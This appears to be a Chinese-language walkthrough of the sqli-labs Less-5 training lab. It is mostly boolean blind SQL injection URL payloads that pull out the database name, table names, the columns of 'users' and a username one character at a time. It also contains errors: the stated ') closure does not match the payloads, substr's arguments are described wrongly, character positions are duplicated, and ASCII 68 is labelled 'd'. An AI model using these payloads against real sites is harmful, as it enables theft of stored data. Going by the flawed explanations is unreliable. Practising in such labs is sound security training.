sqli-labs less-5
第五关和前面的几关不同
* 判断注入
输入?id=1 回显信息为You are in……
判断注入类型
输入?id=1'
根据报错信息可知,注入类型为字符型
输入?id=1' --+ 回显正常
由此可知,闭合方式为’)
* 判断列数
输入?id=1') order by 3 --+ 回显正常
输入?id=1') order by 4 --+ 回显错误
故字段数为3,有3列
* 查询详细信息
由于本关的页面没有回显,故不能采用联合查询,没有报错信息,故也不能采用报错注入的方式
所以本关采用布尔盲注的方式
布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false,构造SQL语句,利用and,or等关键字来其后的语句
true
、false
使web页面返回true或者false,从而达到注入的目的来获取信息
布尔盲注的流程:
- 求当前数据库的长度
使用length函数
输入?id=1') and length(database())=1 --+
判断数据库名的长度是否为1
页面无回显,故数据库名的长度不为1,我们从1开始依次尝试,到8时页面回显正常
由此可知,数据库名的长度为8
-
求当前数据库名
可以使用substr函数进行盲注
输入?id=1' and (substr(database(),1,1)='s') --+
(其中第一个参数为传入字符串,第二个参数是取几位,第三个参数为步长)
页面回显正常,可以判读数据库名的第一个字母为s,同样,我们尝试输入一下url
?id=1' and (substr(database(),2,1)='e') --+
?id=1' and (substr(database(),3,1)='c') --+
?id=1' and (substr(database(),4,1)='u') --+
?id=1' and (substr(database(),5,1)='r') --+
?id=1' and (substr(database(),6,1)='i') --+
?id=1' and (substr(database(),7,1)='t') --+
?id=1' and (substr(database(),8,1)='y') --+
数据库的名字就那几个,基本上知道了长度就能判断出名字来了
所以可以判断出数据库名为‘security’
-
求当前数据库中表的个数
输入?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=3 --+ 回显错误
输入?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+ 回显正常
输入?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=5 --+ 回显错误
由此可知表的个数为4
-
求表名
-
可通过直接猜测的方法
输入?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 0,1)='emails' --+
-
?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 1,1)='referers' --+
?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 2,1)='uagents' --+
?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 3,1)='users' --+
-
也可先求表名的长度
输入?id=1' and (length((select table_name from information_schema.tables where table_schema = database() limit 0,1))) = 6 --+ 回显正常 (或?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),6,1)) --+ 回显正常)
再通过使用ASCII函数猜测表名
输入?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=101 --+ ->e ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),2,1))=109 --+ ->m ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),3,1))=97 --+ ->a ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),4,1))=105 --+ ->i ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),5,1))=108 --+ ->l ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),6,1))=115 --+ ->s
由此可知表名为emails
-
查询表下列的数量
输入?id=1' and (select count(column_name) from information_schema.columns where table_name ='users') = 3 --+ 回显正常
-
查询表下列的长度
输入?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 0,1),2,1)) --+ 回显正常
-
查询表下的列名
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 0,1),1,1)) = 105 --+ ->i ?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 0,1),2,1)) = 100 --+ ->d
列一:id
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),1,1)) = 117 --+ ->u ?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),2,1)) = 115 --+ ->s ………… ?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),7,1)) = 109 --+ ->m ?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 1,1),7,1)) = 101 --+ ->e
列二:username
同理可猜出列三为:password
-
求表中某字段的数量
?id=1' and (select count(username) from users) = 13 --+ 回显正常
-
求字段的长度
?id=1 and ascii(substr((select username from users limit 0,1),4,1)) --+ 回显正常
-
求字段名
?id=1 and ascii(substr((select username from users limit 0,1),1,1)) = 68 --+ ->d ?id=1 and ascii(substr((select username from users limit 0,1),2,1)) = 117 --+ ->u ?id=1 and ascii(substr((select username from users limit 0,1),2,1)) = 109 --+ ->m ?id=1 and ascii(substr((select username from users limit 0,1),4,1)) = 98 --+ ->b
即完成